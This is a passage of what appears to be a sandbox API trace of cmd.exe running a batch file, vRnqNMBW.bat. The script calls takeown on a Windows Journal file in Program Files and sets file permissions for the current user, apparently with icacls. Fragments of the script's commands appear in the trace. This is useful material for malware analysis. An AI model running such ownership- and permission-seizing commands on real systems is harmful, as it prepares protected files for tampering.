(_String1="takeown", _String2="DIR") returned 16 [0291.878] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0291.878] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0291.878] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0291.878] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0291.878] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0291.878] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0291.878] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0291.878] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0291.878] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0291.878] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0291.878] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0291.878] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0291.878] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0291.878] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0291.878] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0291.878] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0291.878] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0291.878] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0291.878] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0291.878] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0291.878] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0291.878] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0291.878] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0291.878] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0291.878] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0291.878] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0291.878] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0291.878] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0291.878] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0291.878] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0291.878] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0291.878] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0291.878] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0291.878] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0291.878] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0291.879] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0291.879] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0291.879] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0291.879] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0291.879] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0291.879] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0291.879] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0291.879] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0291.879] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0291.879] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0291.879] SetErrorMode (uMode=0x0) returned 0x0 [0291.879] SetErrorMode (uMode=0x1) returned 0x0 [0291.879] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xcbce28, lpFilePart=0x9deaac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x9deaac*="Desktop") returned 0x1d [0291.879] SetErrorMode (uMode=0x0) returned 0x1 [0291.879] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0291.879] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0291.879] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0291.879] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0291.879] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x9de838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9de838) returned 0xffffffff [0291.879] GetLastError () returned 0x2 [0291.879] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0291.880] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x9de838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9de838) returned 0xffffffff [0291.880] GetLastError () returned 0x2 [0291.880] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0291.880] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x9de838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9de838) returned 0xcbfd88 [0291.880] FindClose (in: hFindFile=0xcbfd88 | out: hFindFile=0xcbfd88) returned 1 [0291.880] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x9de838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9de838) returned 0xffffffff [0291.880] GetLastError () returned 0x2 [0291.880] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x9de838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9de838) returned 0xcbfd88 [0291.880] FindClose (in: hFindFile=0xcbfd88 | out: hFindFile=0xcbfd88) returned 1 [0291.880] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0291.880] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0291.880] GetConsoleTitleW (in: lpConsoleTitle=0x9ded2c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0291.881] InitializeProcThreadAttributeList (in: lpAttributeList=0x9dec58, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x9dec3c | out: lpAttributeList=0x9dec58, lpSize=0x9dec3c) returned 1 [0291.881] UpdateProcThreadAttribute (in: lpAttributeList=0x9dec58, dwFlags=0x0, Attribute=0x60001, lpValue=0x9dec44, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x9dec58, lpPreviousValue=0x0) returned 1 [0291.881] GetStartupInfoW (in: lpStartupInfo=0x9dec90 | out: lpStartupInfo=0x9dec90*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0291.881] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0291.882] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0291.882] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0291.882] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0291.882] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0291.882] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0291.882] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x9debe0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x9dec2c | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\"", lpProcessInformation=0x9dec2c*(hProcess=0xb0, hThread=0xb8, dwProcessId=0x5dc, dwThreadId=0xbd8)) returned 1 [0291.890] CloseHandle (hObject=0xb8) returned 1 [0291.890] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0291.890] GetEnvironmentStringsW () returned 0xcbb300* [0291.890] FreeEnvironmentStringsA (penv="=") returned 1 [0291.890] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) returned 0x0 [0293.536] GetExitCodeProcess (in: hProcess=0xb0, lpExitCode=0x9debc4 | out: lpExitCode=0x9debc4*=0x0) returned 1 [0293.536] CloseHandle (hObject=0xb0) returned 1 [0293.537] _vsnwprintf (in: _Buffer=0x9decac, _BufferCount=0x13, _Format="%08X", _ArgList=0x9debcc | out: _Buffer="00000000") returned 8 [0293.537] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0293.537] GetEnvironmentStringsW () returned 0xcbb300* [0293.537] FreeEnvironmentStringsA (penv="=") returned 1 [0293.537] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0293.537] GetEnvironmentStringsW () returned 0xcbb300* [0293.537] FreeEnvironmentStringsA (penv="=") returned 1 [0293.537] DeleteProcThreadAttributeList (in: lpAttributeList=0x9dec58 | out: lpAttributeList=0x9dec58) [0293.537] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.537] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0293.662] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.662] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0293.662] _get_osfhandle (_FileHandle=0) returned 0x38 [0293.662] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0293.662] SetConsoleInputExeNameW () returned 0x1 [0293.662] GetConsoleOutputCP () returned 0x1b5 [0293.663] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0293.663] SetThreadUILanguage (LangId=0x0) returned 0x409 [0293.663] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9df3ec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0293.663] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0293.663] _get_osfhandle (_FileHandle=3) returned 0xb0 [0293.663] SetFilePointer (in: hFile=0xb0, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0293.664] _get_osfhandle (_FileHandle=3) returned 0xb0 [0293.664] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0293.664] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9df3bc, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x9df3bc*=0xb3, lpOverlapped=0x0) returned 1 [0293.664] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0293.664] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=16, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0293.664] _get_osfhandle (_FileHandle=3) returned 0xb0 [0293.664] GetFileType (hFile=0xb0) returned 0x1 [0293.664] _get_osfhandle (_FileHandle=3) returned 0xb0 [0293.664] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0293.665] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp", nBufferLength=0x208, lpBuffer=0x9deb38, lpFilePart=0x9deafc | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp", lpFilePart=0x9deafc*="Memo.jtp") returned 0x33 [0293.665] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x9de840 | out: lpFindFileData=0x9de840) returned 0xcb09d8 [0293.665] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0293.665] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0293.665] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0x9de840 | out: lpFindFileData=0x9de840) returned 0xcb09d8 [0293.665] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0293.665] _wcsnicmp (_String1="WIA843~1", _String2="Windows Journal", _MaxCount=0xf) returned -13 [0293.665] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates", lpFindFileData=0x9de840 | out: lpFindFileData=0x9de840) returned 0xcb09d8 [0293.665] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0293.665] _wcsnicmp (_String1="TEMPLA~1", _String2="Templates", _MaxCount=0x9) returned 10 [0293.665] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp", lpFindFileData=0x9de840 | out: lpFindFileData=0x9de840) returned 0xcb09d8 [0293.666] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0293.666] _wcsicmp (_String1="set", _String2=")") returned 74 [0293.666] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0293.666] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0293.666] _wcsicmp (_String1="IF", _String2="set") returned -10 [0293.666] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0293.666] _wcsicmp (_String1="REM", _String2="set") returned -1 [0293.666] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0293.666] _tell (_FileHandle=3) returned 63 [0293.667] _close (_FileHandle=3) returned 0 [0293.667] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x9df180 | out: _Buffer="\r\n") returned 2 [0293.667] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.667] GetFileType (hFile=0x3c) returned 0x2 [0293.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.667] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df158 | out: lpMode=0x9df158) returned 1 [0293.808] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.808] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x9df170, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df170*=0x2) returned 1 [0294.276] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0294.276] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0294.276] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x9df17c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0294.276] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x9df17c | out: _Buffer=">") returned 1 [0294.276] _get_osfhandle (_FileHandle=1) returned 0x3c [0294.276] GetFileType (hFile=0x3c) returned 0x2 [0294.276] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0294.276] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df15c | out: lpMode=0x9df15c) returned 1 [0295.062] _get_osfhandle (_FileHandle=1) returned 0x3c [0295.062] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x9df174, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x9df174*=0x1e) returned 1 [0295.616] _get_osfhandle (_FileHandle=1) returned 0x3c [0295.617] GetFileType (hFile=0x3c) returned 0x2 [0295.617] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0295.617] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3fc | out: lpMode=0x9df3fc) returned 1 [0296.012] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.012] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xcc8200*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x9df414, lpReserved=0x0 | out: lpBuffer=0xcc8200*, lpNumberOfCharsWritten=0x9df414*=0x3) returned 1 [0296.133] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x9df41c | out: _Buffer=" FN=\"Memo.jtp\" ") returned 15 [0296.133] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.133] GetFileType (hFile=0x3c) returned 0x2 [0296.133] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.133] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3f4 | out: lpMode=0x9df3f4) returned 1 [0296.257] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.257] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x9df40c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df40c*=0xf) returned 1 [0296.276] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x9df430 | out: _Buffer="\r\n") returned 2 [0296.276] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.276] GetFileType (hFile=0x3c) returned 0x2 [0296.276] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.276] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df408 | out: lpMode=0x9df408) returned 1 [0296.286] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.286] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x9df420, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df420*=0x2) returned 1 [0296.289] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0296.289] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0296.289] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0296.289] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0296.289] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0296.289] _wcsicmp (_String1="set", _String2="CD") returned 16 [0296.289] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0296.289] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0296.289] _wcsicmp (_String1="set", _String2="REN") returned 1 [0296.289] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0296.289] _wcsicmp (_String1="set", _String2="SET") returned 0 [0296.289] GetConsoleTitleW (in: lpConsoleTitle=0x9defa0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0296.294] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0296.294] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0296.294] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0296.294] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0296.294] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0296.294] _wcsicmp (_String1="set", _String2="CD") returned 16 [0296.294] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0296.294] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0296.294] _wcsicmp (_String1="set", _String2="REN") returned 1 [0296.294] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0296.294] _wcsicmp (_String1="set", _String2="SET") returned 0 [0296.295] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0296.295] _wcsnicmp (_String1="FN", _String2="/A", _MaxCount=0x2) returned 55 [0296.295] _wcsnicmp (_String1="FN", _String2="/P", _MaxCount=0x2) returned 55 [0296.295] SetEnvironmentVariableW (lpName="FN", lpValue="\"Memo.jtp\"") returned 1 [0296.295] GetEnvironmentStringsW () returned 0xcbb300* [0296.295] FreeEnvironmentStringsA (penv="=") returned 1 [0296.295] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.295] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0296.297] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.297] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0296.301] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.301] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0296.310] SetConsoleInputExeNameW () returned 0x1 [0296.310] GetConsoleOutputCP () returned 0x1b5 [0296.314] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0296.314] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.316] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9df3ec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0296.317] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0296.317] _get_osfhandle (_FileHandle=3) returned 0xb0 [0296.317] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0296.317] _get_osfhandle (_FileHandle=3) returned 0xb0 [0296.317] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0296.318] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9df3bc, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x9df3bc*=0xa3, lpOverlapped=0x0) returned 1 [0296.318] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0296.318] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0296.318] _get_osfhandle (_FileHandle=3) returned 0xb0 [0296.318] GetFileType (hFile=0xb0) returned 0x1 [0296.318] _get_osfhandle (_FileHandle=3) returned 0xb0 [0296.318] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0296.318] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x208, lpBuffer=0x9deb38, lpFilePart=0x9deafc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0x9deafc*="vRnqNMBW.bat") returned 0x2a [0296.318] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x9de840 | out: lpFindFileData=0x9de840) returned 0xcb09d8 [0296.318] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0296.318] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x9de840 | out: lpFindFileData=0x9de840) returned 0xcb09d8 [0296.318] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0296.318] _wcsnicmp (_String1="CIIHMN~1", 